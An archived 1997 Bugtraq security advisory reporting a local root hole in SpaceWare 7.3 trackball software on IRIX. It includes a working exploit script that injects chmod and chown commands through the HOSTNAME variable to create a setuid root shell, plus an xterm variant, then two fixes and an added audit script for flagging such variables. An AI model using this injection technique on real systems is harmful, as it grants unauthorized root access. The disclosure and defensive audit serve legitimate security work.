root bug in spaceware

Summary
Description: Root hole in SpaceWare trackball software
Author: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Compromise: root (local)
Vulnerable Systems: Presumably any system running spaceware 7.3 v1.0 (probably earlier). I don't know if it is IRIX specific. From the message it sounds like there are likely other holes in the program.
Date: 20 August 1997
Details


Date: Wed, 20 Aug 1997 15:53:31 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: SpaceWare 7.3 v1.0

        Hello

        I guess anyone who's reading this has already noticed (if
        you are playing with a SpaceBall); anyway, here it goes:


===========================================================================
#!/bin/sh

SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh

echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1

/tmp/sh
===========================================================================

        more information:

        IRIX 6.2
        spaceware 7.3 v1.0 (http://www.spacetec.com/)
        ftp://ftp.spacetec.com/put/spaceball2003and3003/drivers/app.irix.7_3.tar

        (Obviously, you can use HOSTNAME for any command you want
        to run as root, like
echo 6 | HOSTNAME="`which xterm` -e `which sh`" /usr/local/SpaceWare/spaceball
        )

        Fix:

        a) rm (since spaceball.sh does lots of nasty things, like
        running spaceball demos as root, probably this is the best
        solution)

        b) set HOSTNAME=/usr/bsd/hostname in the "Utilities" section of
        $SWDIR/spaceball.sh



--
    J.A. Gutierrez
    finger me for PGP
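
Added example, not part of the original post and not SpaceWare code: a heuristic audit that flags variables a shell script runs as a command without assigning them a fixed value, which is the condition fix (b) removes. It assumes the wrapper executes `$HOSTNAME` as a command, as fix (b) suggests; the function names and the two sample scripts are constructed stand-ins, not the real spaceball.sh.

```shell
#!/bin/sh
# Added example (not from the original post): heuristic audit of a shell
# script for variables that are executed as commands but whose value can
# still come from the caller's environment.

# Print, sorted, each variable used in command position in file $1 that the
# script never assigns a fixed value (NAME=${NAME:-x} does not count).
env_command_vars() {
    awk '
    {
        line = $0
        sub(/#.*/, "", line)            # drop comments (naive about quoting)
        if (match(line, /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/)) {
            name = substr(line, RSTART, RLENGTH - 1)
            gsub(/[ \t]/, "", name)
            rhs = substr(line, RSTART + RLENGTH)
            # An assignment that reads the same variable keeps the inherited value.
            if (rhs !~ ("[$][{]?" name "([^A-Za-z0-9_]|$)")) fixed[name] = 1
        }
        # $NAME or ${NAME} at line start or right after ` ( | ; & is run as a command.
        while (match(line, /(^|[`(|;&])[ \t]*[$][{]?[A-Za-z_][A-Za-z0-9_]*/)) {
            tok = substr(line, RSTART, RLENGTH)
            sub(/^.*[$][{]?/, "", tok)
            used[tok] = 1
            line = "x" substr(line, RSTART + RLENGTH)   # sentinel: ^ must not re-match
        }
    }
    END { for (v in used) if (!(v in fixed)) print v }
    ' "$1" | sort
}

# Constructed stand-ins for a root-run wrapper; NOT the real spaceball.sh.
write_samples() {
    cat > "$1/inherits.sh" <<'EOF'
#!/bin/sh
# Utilities
HOST=`$HOSTNAME`
echo "starting driver on $HOST"
EOF
    cat > "$1/pinned.sh" <<'EOF'
#!/bin/sh
# Utilities
HOSTNAME=/usr/bsd/hostname
HOST=`$HOSTNAME`
echo "starting driver on $HOST"
EOF
}
```

Any name it prints is a command the script takes from its caller; in a setuid or root-run wrapper each one should be pinned to an absolute path inside the script.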

This page is part of Fyodor's exploit world.